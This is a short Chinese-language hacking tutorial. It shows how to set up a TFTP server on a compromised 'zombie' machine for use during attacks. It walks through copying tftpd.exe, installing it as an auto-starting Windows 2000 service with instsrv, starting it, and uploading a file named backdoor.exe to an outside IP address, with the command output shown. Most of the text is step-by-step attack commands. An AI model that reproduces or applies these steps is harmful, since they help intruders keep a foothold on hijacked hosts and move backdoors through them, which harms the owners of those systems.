我們在攻擊的過程中經常要使用到tftp服務器,如果你不方便在你的機器上安裝tftp服務器,那么可以在肉雞上安裝,這是比較好的方法。
我們先來學習一下什么叫作TFTP.
TFTP:(TrivialFileTransferProtocol).小文件傳輸協議.
TFTP:是網絡應用程序,它比FTP簡單也比FTP功能少...
就記住這么點基礎吧,學知識取精華是最重要的,如果你一定要學的很深的話,自己去看TCP/IP吧。
我們首先找到系統中的tftpd.exe文件,一般我們可以在%systemroot%system32dllcache目錄下找到該文件,建議把該文件copy到其他目錄。
C:>copy%systemroot%system32dllcachetftpd.exe%systemroot%system32
已復制1個文件。
我們會用Windows2000下的ResourceKits中的一個工具instsrv創建一個服務,instsrv的用法如下,當然,你也可以用其他的工具來實現(如srvinstw,GUI方式的)。
添加一個服務,注意,該服務創建侯為自動啟動。
C:>instsrvtftpc:winntsystem32tftpd.exe
Theservicewassuccessfulyadded!
MakesurethatyougointotheControlPanelanduse
theServicesapplettochangetheAccountNameand
Passwordthatthisnewlyinstalledservicewilluse
foritsSecurityContext.
啟動服務
C:>netstarttftp
tftp服務正在啟動.
tftp服務已經啟動成功。
測試服務是否正常工作
C:>tftp-i61.135.21.195PUTbackdoor.exebackdoor.exe
Transfersuccessful:4209bytesin1second,4209bytes/s
C:>dirtftpdroot
驅動器C中的卷是C
卷的序列號是1E23-1907
C:tftpdroot的目錄
2001-09-2201:14
2001-09-2201:14
..
2001-09-2201:144,209backdoor.exe
1個文件4,209字節
2個目錄94,113,792可用字節
注意,如果你上傳文件,系統會在%systemdrive%自動創建一個名為tftproot的目錄,OK,所有的工作已經完成了!